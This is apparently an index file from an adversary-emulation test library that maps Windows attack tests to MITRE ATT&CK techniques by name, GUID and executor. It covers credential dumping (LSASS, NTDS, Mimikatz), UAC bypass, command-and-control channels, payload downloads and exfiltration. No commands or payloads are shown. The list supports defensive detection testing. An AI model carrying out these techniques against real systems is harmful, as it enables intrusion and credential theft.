discovery,T1082,System Information Discovery,10,Environment variables discovery on windows,f400d1c0-1804-4ff8-b069-ef5ddd2adbf3,command_prompt
discovery,T1016,System Network Configuration Discovery,1,System Network Configuration Discovery on Windows,970ab6a1-0157-4f3f-9a73-ec4166754b23,command_prompt
discovery,T1016,System Network Configuration Discovery,2,List Windows Firewall Rules,038263cb-00f4-4b0a-98ae-0696c67e1752,command_prompt
discovery,T1016,System Network Configuration Discovery,4,System Network Configuration Discovery (TrickBot Style),dafaf052-5508-402d-bf77-51e0700c02e2,command_prompt
discovery,T1016,System Network Configuration Discovery,5,List Open Egress Ports,4b467538-f102-491d-ace7-ed487b853bf5,powershell
discovery,T1016,System Network Configuration Discovery,6,Adfind - Enumerate Active Directory Subnet Objects,9bb45dd7-c466-4f93-83a1-be30e56033ee,command_prompt
discovery,T1016,System Network Configuration Discovery,7,Qakbot Recon,121de5c6-5818-4868-b8a7-8fd07c455c1b,command_prompt
discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt
discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell
discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
discovery,T1033,System Owner/User Discovery,1,System Owner/User Discovery,4c4959bf-addf-4b4a-be86-8d09cc1857aa,command_prompt
discovery,T1033,System Owner/User Discovery,3,Find computers where user has session - Stealth mode (PowerView),29857f27-a36f-4f7e-8084-4557cd6207ca,powershell
discovery,T1007,System Service Discovery,1,System Service Discovery,89676ba1-b1f8-47ee-b940-2e1a113ebc71,command_prompt
discovery,T1007,System Service Discovery,2,System Service Discovery - net.exe,5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3,command_prompt
discovery,T1124,System Time Discovery,1,System Time Discovery,20aba24b-e61f-4b26-b4ce-4784f763ca20,command_prompt
discovery,T1124,System Time Discovery,2,System Time Discovery - PowerShell,1d5711d6-655c-4a47-ae9c-6503c74fa877,powershell
command-and-control,T1071.004,DNS,1,DNS Large Query Volume,1700f5d6-5a44-487b-84de-bc66f507b0a6,powershell
command-and-control,T1071.004,DNS,2,DNS Regular Beaconing,3efc144e-1af8-46bb-8ca2-1376bb6db8b6,powershell
command-and-control,T1071.004,DNS,3,DNS Long Domain Query,fef31710-223a-40ee-8462-a396d6b66978,powershell
command-and-control,T1071.004,DNS,4,DNS C2,e7bf9802-2e78-4db9-93b5-181b7bcd37d7,powershell
command-and-control,T1573,Encrypted Channel,1,OpenSSL C2,21caf58e-87ad-440c-a6b8-3ac259964003,powershell
command-and-control,T1105,Ingress Tool Transfer,7,certutil download (urlcache),dd3b61dd-7bbc-48cd-ab51-49ad1a776df0,command_prompt
command-and-control,T1105,Ingress Tool Transfer,8,certutil download (verifyctl),ffd492e3-0455-4518-9fb1-46527c9f241b,powershell
command-and-control,T1105,Ingress Tool Transfer,9,Windows - BITSAdmin BITS Download,a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b,command_prompt
command-and-control,T1105,Ingress Tool Transfer,10,Windows - PowerShell Download,42dc4460-9aa6-45d3-b1a6-3955d34e1fe8,powershell
command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca61766-b456-4fcf-a35a-1233685e1cad,command_prompt
command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt
command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt
command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
command-and-control,T1095,Non-Application Layer Protocol,1,ICMP C2,0268e63c-e244-42db-bef7-72a9e59fc1fc,powershell
command-and-control,T1095,Non-Application Layer Protocol,2,Netcat C2,bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37,powershell
command-and-control,T1095,Non-Application Layer Protocol,3,Powercat C2,3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e,powershell
command-and-control,T1571,Non-Standard Port,1,Testing usage of uncommonly used port with PowerShell,21fe622f-8e53-4b31-ba83-6d333c2583f4,powershell
command-and-control,T1219,Remote Access Software,1,TeamViewer Files Detected Test on Windows,8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0,powershell
command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test on Windows,6b8b7391-5c0a-4f8c-baee-78d8ce0ce330,powershell
command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell
command-and-control,T1132.001,Standard Encoding,2,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell
command-and-control,T1071.001,Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell
command-and-control,T1071.001,Web Protocols,2,Malicious User Agents - CMD,dc3488b0-08c7-4fea-b585-905c83b48180,command_prompt
execution,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
execution,T1559.002,Dynamic Data Exchange,1,Execute Commands,f592ba2a-e9e8-4d62-a459-ef63abd819fd,manual
execution,T1559.002,Dynamic Data Exchange,2,Execute PowerShell script via Word DDE,47c21fb6-085e-4b0d-b4d2-26d72c3830b3,command_prompt
execution,T1559.002,Dynamic Data Exchange,3,DDEAUTO,cf91174c-4e74-414e-bec0-8d60a104d181,manual
execution,T1204.002,Malicious File,1,OSTap Style Macro Execution,8bebc690-18c7-4549-bc98-210f7019efff,powershell
execution,T1204.002,Malicious File,2,OSTap Payload Download,3f3af983-118a-4fa1-85d3-ba4daa739d80,command_prompt
execution,T1204.002,Malicious File,3,Maldoc choice flags command execution,0330a5d2-a45a-4272-a9ee-e364411c4b18,powershell
execution,T1204.002,Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c340f930911,powershell
execution,T1204.002,Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell
execution,T1204.002,Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d2a98052,powershell
execution,T1204.002,Malicious File,7,Headless Chrome code execution via VBA,a19ee671-ed98-4e9d-b19c-d1954a51585a,powershell
execution,T1204.002,Malicious File,8,Potentially Unwanted Applications (PUA),02f35d62-9fdc-4a97-b899-a5d9a876d295,powershell
execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
execution,T1059.001,PowerShell,3,Run Bloodhound from Memory using Download Cradle,bf8c1441-4674-4dab-8e4e-39d93d08f9b7,powershell
execution,T1059.001,PowerShell,4,Obfuscation Tests,4297c41a-8168-4138-972d-01f3ee92c804,powershell
execution,T1059.001,PowerShell,5,Mimikatz - Cradlecraft PsSendKeys,af1800cf-9f9d-4fd1-a709-14b1e6de020d,powershell
execution,T1059.001,PowerShell,6,Invoke-AppPathBypass,06a220b6-7e29-4bd8-9d07-5b4d86742372,command_prompt
execution,T1059.001,PowerShell,7,Powershell MsXml COM object - with prompt,388a7340-dbc1-4c9d-8e59-b75ad8c6d5da,command_prompt
execution,T1059.001,PowerShell,8,Powershell XML requests,4396927f-e503-427b-b023-31049b9b09a6,command_prompt
execution,T1059.001,PowerShell,9,Powershell invoke mshta.exe download,8a2ad40b-12c7-4b25-8521-2737b0a415af,command_prompt
execution,T1059.001,PowerShell,10,Powershell Invoke-DownloadCradle,cc50fa2a-a4be-42af-a88f-e347ba0bf4d7,manual
execution,T1059.001,PowerShell,11,PowerShell Fileless Script Execution,fa050f5e-bc75-4230-af73-b6fd7852cd73,powershell
execution,T1059.001,PowerShell,12,PowerShell Downgrade Attack,9148e7c4-9356-420e-a416-e896e9c0f73e,powershell
execution,T1059.001,PowerShell,13,NTFS Alternate Data Stream Access,8e5c5532-1181-4c1d-bb79-b3a9f5dbd680,powershell
execution,T1059.001,PowerShell,14,PowerShell Session Creation and Use,7c1acec2-78fa-4305-a3e0-db2a54cddecd,powershell
execution,T1059.001,PowerShell,15,ATHPowerShellCommandLineParameter -Command parameter variations,686a9785-f99b-41d4-90df-66ed515f81d7,powershell
execution,T1059.001,PowerShell,16,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell
execution,T1059.001,PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell
execution,T1059.001,PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell
execution,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
execution,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
execution,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
execution,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
execution,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
execution,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
execution,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
execution,T1059.005,Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell
execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell
execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell
execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
execution,T1059.003,Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt
execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt
execution,T1047,Windows Management Instrumentation,4,WMI Reconnaissance List Remote Services,0fd48ef7-d890-4e93-a533-f7dedd5191d3,command_prompt
execution,T1047,Windows Management Instrumentation,5,WMI Execute Local Process,b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3,command_prompt
execution,T1047,Windows Management Instrumentation,6,WMI Execute Remote Process,9c8ef159-c666-472f-9874-90c8d60d136b,command_prompt
execution,T1047,Windows Management Instrumentation,7,Create a Process using WMI Query and an Encoded Command,7db7a7f9-9531-4840-9b30-46220135441c,command_prompt
execution,T1047,Windows Management Instrumentation,8,Create a Process using obfuscated Win32_Process,10447c83-fc38-462a-a936-5102363b1c43,powershell
exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell
lateral-movement,T1021.003,Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell
lateral-movement,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
lateral-movement,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
lateral-movement,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
lateral-movement,T1563.002,RDP Hijacking,1,RDP hijacking,a37ac520-b911-458e-8aed-c5f1576d9f46,command_prompt
lateral-movement,T1021.001,Remote Desktop Protocol,1,RDP to DomainController,355d4632-8cb9-449d-91ce-b566d0253d3e,powershell
lateral-movement,T1021.001,Remote Desktop Protocol,2,RDP to Server,7382a43e-f19c-46be-8f09-5c63af7d3e2b,powershell
lateral-movement,T1021.002,SMB/Windows Admin Shares,1,Map admin share,3386975b-367a-4fbb-9d77-4dcf3639ffd3,command_prompt
lateral-movement,T1021.002,SMB/Windows Admin Shares,2,Map Admin Share PowerShell,514e9cd7-9207-4882-98b1-c8f791bae3c5,powershell
lateral-movement,T1021.002,SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt
lateral-movement,T1021.002,SMB/Windows Admin Shares,4,Execute command writing output to local Admin Share,d41aaab5-bdfe-431d-a3d5-c29e9136ff46,command_prompt
lateral-movement,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
lateral-movement,T1021.006,Windows Remote Management,1,Enable Windows Remote Management,9059e8de-3d7d-4954-a322-46161880b9cf,powershell
lateral-movement,T1021.006,Windows Remote Management,2,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
lateral-movement,T1021.006,Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell
initial-access,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
initial-access,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
initial-access,T1566.001,Spearphishing Attachment,1,Download Phishing Attachment - VBScript,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
initial-access,T1566.001,Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 credential-access T1056.004 Credential API Hooking 1 Hook PowerShell TLS Encrypt/Decrypt Messages de1934ea-1fbf-425b-8795-65fb27dd7e33 powershell
3 credential-access T1552.001 Credentials In Files 3 Extracting passwords with findstr 0e56bf29-ff49-4ea5-9af4-3b81283fd513 powershell
4 credential-access T1552.001 Credentials In Files 4 Access unattend.xml 367d4004-5fc0-446d-823f-960c74ae52c3 command_prompt
5 credential-access T1555 Credentials from Password Stores 1 Extract Windows Credential Manager via VBA 234f9b7c-b53d-4f32-897b-b880a6c9ea7b powershell
6 credential-access T1555 Credentials from Password Stores 2 Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] c89becbe-1758-4e7d-a0f4-97d2188a23e3 powershell
7 credential-access T1555 Credentials from Password Stores 3 Dump credentials from Windows Credential Manager With PowerShell [web Credentials] 8fd5a296-6772-4766-9991-ff4e92af7240 powershell
8 credential-access T1555.003 Credentials from Web Browsers 1 Run Chrome-password Collector 8c05b133-d438-47ca-a630-19cc464c4622 powershell
9 credential-access T1555.003 Credentials from Web Browsers 3 LaZagne - Credentials from Browser 9a2915b3-3954-4cce-8c76-00fbf4dbd014 command_prompt
10 credential-access T1552.002 Credentials in Registry 1 Enumeration for Credentials in Registry b6ec082c-7384-46b3-a111-9a9b8b14e5e7 command_prompt
11 credential-access T1552.002 Credentials in Registry 2 Enumeration for PuTTY Credentials in Registry af197fd7-e868-448e-9bd5-05d1bcd9d9e5 command_prompt
12 credential-access T1003.006 DCSync 1 DCSync (Active Directory) 129efd28-8497-4c87-a1b0-73b9a870ca3e command_prompt
13 credential-access T1056.002 GUI Input Capture 2 PowerShell - Prompt User for Password 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 powershell
14 credential-access T1558.001 Golden Ticket 1 Crafting Active Directory golden tickets with mimikatz 9726592a-dabc-4d4d-81cd-44070008b3af powershell
15 credential-access T1552.006 Group Policy Preferences 1 GPP Passwords (findstr) 870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f command_prompt
16 credential-access T1552.006 Group Policy Preferences 2 GPP Passwords (Get-GPPPassword) e9584f82-322c-474a-b831-940fd8b4455c powershell
17 credential-access T1558.003 Kerberoasting 1 Request for service tickets 3f987809-3681-43c8-bcd8-b3ff3a28533a powershell
18 credential-access T1056.001 Keylogging 1 Input Capture d9b633ca-8efb-45e6-b838-70f595c6ae26 powershell
19 credential-access T1003.004 LSA Secrets 1 Dumping LSA Secrets 55295ab0-a703-433b-9ca4-ae13807de12f command_prompt
20 credential-access T1003.001 LSASS Memory 1 Windows Credential Editor 0f7c5301-6859-45ba-8b4d-1fac30fc31ed command_prompt
21 credential-access T1003.001 LSASS Memory 2 Dump LSASS.exe Memory using ProcDump 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8 command_prompt
22 credential-access T1003.001 LSASS Memory 3 Dump LSASS.exe Memory using comsvcs.dll 2536dee2-12fb-459a-8c37-971844fa73be powershell
23 credential-access T1003.001 LSASS Memory 4 Dump LSASS.exe Memory using direct system calls and API unhooking 7ae7102c-a099-45c8-b985-4c7a2d05790d command_prompt
24 credential-access T1003.001 LSASS Memory 5 Dump LSASS.exe Memory using Windows Task Manager dea6c349-f1c6-44f3-87a1-1ed33a59a607 manual
25 credential-access T1003.001 LSASS Memory 6 Offline Credential Theft With Mimikatz 453acf13-1dbd-47d7-b28a-172ce9228023 command_prompt
26 credential-access T1003.001 LSASS Memory 7 LSASS read with pypykatz c37bc535-5c62-4195-9cc3-0517673171d8 command_prompt
27 credential-access T1003.001 LSASS Memory 8 Dump LSASS.exe Memory using Out-Minidump.ps1 6502c8f0-b775-4dbd-9193-1298f56b6781 powershell
28 credential-access T1003.001 LSASS Memory 9 Create Mini Dump of LSASS.exe using ProcDump 7cede33f-0acd-44ef-9774-15511300b24b command_prompt
29 credential-access T1003.001 LSASS Memory 10 Powershell Mimikatz 66fb0bc1-3c3f-47e9-a298-550ecfefacbc powershell
30 credential-access T1003.001 LSASS Memory 11 Dump LSASS with .Net 5 createdump.exe 9d0072c8-7cca-45c4-bd14-f852cfa35cf0 powershell
31 credential-access T1003.001 LSASS Memory 12 Dump LSASS.exe using imported Microsoft DLLs 86fc3f40-237f-4701-b155-81c01c48d697 powershell
32 credential-access T1003.003 NTDS 1 Create Volume Shadow Copy with vssadmin dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f command_prompt
33 credential-access T1003.003 NTDS 2 Copy NTDS.dit from Volume Shadow Copy c6237146-9ea6-4711-85c9-c56d263a6b03 command_prompt
34 credential-access T1003.003 NTDS 3 Dump Active Directory Database with NTDSUtil 2364e33d-ceab-4641-8468-bfb1d7cc2723 command_prompt
35 credential-access T1003.003 NTDS 4 Create Volume Shadow Copy with WMI 224f7de0-8f0a-4a94-b5d8-989b036c86da command_prompt
36 credential-access T1003.003 NTDS 5 Create Volume Shadow Copy with Powershell 542bb97e-da53-436b-8e43-e0a7d31a6c24 powershell
37 credential-access T1003.003 NTDS 6 Create Symlink to Volume Shadow Copy 21748c28-2793-4284-9e07-d6d028b66702 command_prompt
38 credential-access T1040 Network Sniffing 3 Packet Capture Windows Command Prompt a5b2f6a0-24b4-493e-9590-c699f75723ca command_prompt
39 credential-access T1040 Network Sniffing 4 Windows Internal Packet Capture b5656f67-d67f-4de8-8e62-b5581630f528 command_prompt
40 credential-access T1003 OS Credential Dumping 1 Gsecdump 96345bfc-8ae7-4b6a-80b7-223200f24ef9 command_prompt
41 credential-access T1003 OS Credential Dumping 2 Credential Dumping with NPPSpy 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6 powershell
42 credential-access T1003 OS Credential Dumping 3 Dump svchost.exe to gather RDP credentials d400090a-d8ca-4be0-982e-c70598a23de9 powershell
43 credential-access T1110.002 Password Cracking 1 Password Cracking with Hashcat 6d27df5d-69d4-4c91-bc33-5983ffe91692 command_prompt
44 credential-access T1556.002 Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
45 credential-access T1110.001 Password Guessing 1 Brute Force Credentials of all Active Directory domain users via SMB 09480053-2f98-4854-be6e-71ae5f672224 command_prompt
46 credential-access T1110.001 Password Guessing 2 Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) c2969434-672b-4ec8-8df0-bbb91f40e250 powershell
47 credential-access T1110.003 Password Spraying 1 Password Spray all Domain Users 90bc2e54-6c84-47a5-9439-0a2a92b4b175 command_prompt
48 credential-access T1110.003 Password Spraying 2 Password Spray (DomainPasswordSpray) 263ae743-515f-4786-ac7d-41ef3a0d4b2b powershell
49 credential-access T1110.003 Password Spraying 3 Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos) f14d956a-5b6e-4a93-847f-0c415142f07d powershell
50 credential-access T1552.004 Private Keys 1 Private Keys 520ce462-7ca7-441e-b5a5-f8347f632696 command_prompt
51 credential-access T1003.002 Security Account Manager 1 Registry dump of SAM, creds, and secrets 5c2571d0-1572-416d-9676-812e64ca9f44 command_prompt
52 credential-access T1003.002 Security Account Manager 2 Registry parse with pypykatz a96872b2-cbf3-46cf-8eb4-27e8c0e85263 command_prompt
53 credential-access T1003.002 Security Account Manager 3 esentutl.exe SAM copy a90c2f4d-6726-444e-99d2-a00cd7c20480 command_prompt
54 credential-access T1003.002 Security Account Manager 4 PowerDump Registry dump of SAM for hashes and usernames 804f28fc-68fc-40da-b5a2-e9d0bce5c193 powershell
55 collection T1560 Archive Collected Data 1 Compress Data for Exfiltration With PowerShell 41410c60-614d-4b9d-b66e-b0192dd9c597 powershell
56 collection T1560.001 Archive via Utility 1 Compress Data for Exfiltration With Rar 02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0 command_prompt
57 collection T1560.001 Archive via Utility 2 Compress Data and lock with password for Exfiltration with winrar 8dd61a55-44c6-43cc-af0c-8bdda276860c command_prompt
58 collection T1560.001 Archive via Utility 3 Compress Data and lock with password for Exfiltration with winzip 01df0353-d531-408d-a0c5-3161bf822134 command_prompt
59 collection T1560.001 Archive via Utility 4 Compress Data and lock with password for Exfiltration with 7zip d1334303-59cb-4a03-8313-b3e24d02c198 command_prompt
60 collection T1123 Audio Capture 1 using device audio capture commandlet 9c3ad250-b185-4444-b5a9-d69218a10c95 powershell
61 collection T1119 Automated Collection 1 Automated Collection Command Prompt cb379146-53f1-43e0-b884-7ce2c635ff5b command_prompt
62 collection T1119 Automated Collection 2 Automated Collection PowerShell 634bd9b9-dc83-4229-b19f-7f83ba9ad313 powershell
63 collection T1119 Automated Collection 3 Recon information for export with PowerShell c3f6d794-50dd-482f-b640-0384fbb7db26 powershell
64 collection T1119 Automated Collection 4 Recon information for export with Command Prompt aa1180e2-f329-4e1e-8625-2472ec0bfaf3 command_prompt
65 collection T1115 Clipboard Data 1 Utilize Clipboard to store or execute commands from 0cd14633-58d4-4422-9ede-daa2c9474ae7 command_prompt
66 collection T1115 Clipboard Data 2 Execute Commands from Clipboard using PowerShell d6dc21af-bec9-4152-be86-326b6babd416 powershell
67 collection T1115 Clipboard Data 4 Collect Clipboard Data via VBA 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52 powershell
68 collection T1056.004 Credential API Hooking 1 Hook PowerShell TLS Encrypt/Decrypt Messages de1934ea-1fbf-425b-8795-65fb27dd7e33 powershell
69 collection T1056.002 GUI Input Capture 2 PowerShell - Prompt User for Password 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 powershell
70 collection T1056.001 Keylogging 1 Input Capture d9b633ca-8efb-45e6-b838-70f595c6ae26 powershell
71 collection T1074.001 Local Data Staging 1 Stage data from Discovery.bat 107706a5-6f9f-451a-adae-bab8c667829f powershell
72 collection T1074.001 Local Data Staging 3 Zip a Folder with PowerShell for Staging in Temp a57fbe4b-3440-452a-88a7-943531ac872a powershell
73 collection T1114.001 Local Email Collection 1 Email Collection with PowerShell Get-Inbox 3f1b5096-0139-4736-9b78-19bcb02bb1cb powershell
74 collection T1113 Screen Capture 5 Windows Screencapture 3c898f62-626c-47d5-aad2-6de873d69153 powershell
75 privilege-escalation T1546.008 Accessibility Features 1 Attaches Command Prompt as a Debugger to a List of Target Processes 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 powershell
76 privilege-escalation T1546.008 Accessibility Features 2 Replace binary of sticky keys 934e90cf-29ca-48b3-863c-411737ad44e3 command_prompt
77 privilege-escalation T1546.010 AppInit DLLs 1 Install AppInit Shim a58d9386-3080-4242-ab5f-454c16503d18 command_prompt
78 privilege-escalation T1546.011 Application Shimming 1 Application Shim Installation 9ab27e22-ee62-4211-962b-d36d9a0e6a18 command_prompt
79 privilege-escalation T1546.011 Application Shimming 2 New shim database files created in the default shim database directory aefd6866-d753-431f-a7a4-215ca7e3f13d powershell
80 privilege-escalation T1546.011 Application Shimming 3 Registry key creation and/or modification events for SDB 9b6a06f9-ab5e-4e8d-8289-1df4289db02f powershell
81 privilege-escalation T1055.004 Asynchronous Procedure Call 1 Process Injection via C# 611b39b7-e243-4c81-87a4-7145a90358b1 command_prompt
82 privilege-escalation T1053.002 At (Windows) 1 At.exe Scheduled task 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 command_prompt
83 privilege-escalation T1548.002 Bypass User Account Control 1 Bypass UAC using Event Viewer (cmd) 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 command_prompt
84 privilege-escalation T1548.002 Bypass User Account Control 2 Bypass UAC using Event Viewer (PowerShell) a6ce9acf-842a-4af6-8f79-539be7608e2b powershell
85 privilege-escalation T1548.002 Bypass User Account Control 3 Bypass UAC using Fodhelper 58f641ea-12e3-499a-b684-44dee46bd182 command_prompt
86 privilege-escalation T1548.002 Bypass User Account Control 4 Bypass UAC using Fodhelper - PowerShell 3f627297-6c38-4e7d-a278-fc2563eaaeaa powershell
87 privilege-escalation T1548.002 Bypass User Account Control 5 Bypass UAC using ComputerDefaults (PowerShell) 3c51abf2-44bf-42d8-9111-dc96ff66750f powershell
88 privilege-escalation T1548.002 Bypass User Account Control 6 Bypass UAC by Mocking Trusted Directories f7a35090-6f7f-4f64-bb47-d657bf5b10c1 command_prompt
89 privilege-escalation T1548.002 Bypass User Account Control 7 Bypass UAC using sdclt DelegateExecute 3be891eb-4608-4173-87e8-78b494c029b7 powershell
90 privilege-escalation T1548.002 Bypass User Account Control 8 Disable UAC using reg.exe 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 command_prompt
91 privilege-escalation T1548.002 Bypass User Account Control 9 Bypass UAC using SilentCleanup task 28104f8a-4ff1-4582-bcf6-699dce156608 command_prompt
92 privilege-escalation T1574.012 COR_PROFILER 1 User scope COR_PROFILER 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a powershell
93 privilege-escalation T1574.012 COR_PROFILER 2 System Scope COR_PROFILER f373b482-48c8-4ce4-85ed-d40c8b3f7310 powershell
94 privilege-escalation T1574.012 COR_PROFILER 3 Registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
95 privilege-escalation T1546.001 Change Default File Association 1 Change Default File Association 10a08978-2045-4d62-8c42-1957bbbea102 command_prompt
96 privilege-escalation T1574.001 DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
97 privilege-escalation T1574.002 DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
98 privilege-escalation T1078.001 Default Accounts 1 Enable Guest account with RDP capability and admin priviliges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
99 privilege-escalation T1055.001 Dynamic-link Library Injection 1 Process Injection via mavinject.exe 74496461-11a1-4982-b439-4d87a550d254 powershell
100 privilege-escalation T1546.012 Image File Execution Options Injection 1 IFEO Add Debugger fdda2626-5234-4c90-b163-60849a24c0b8 command_prompt
101 privilege-escalation T1546.012 Image File Execution Options Injection 2 IFEO Global Flags 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 command_prompt
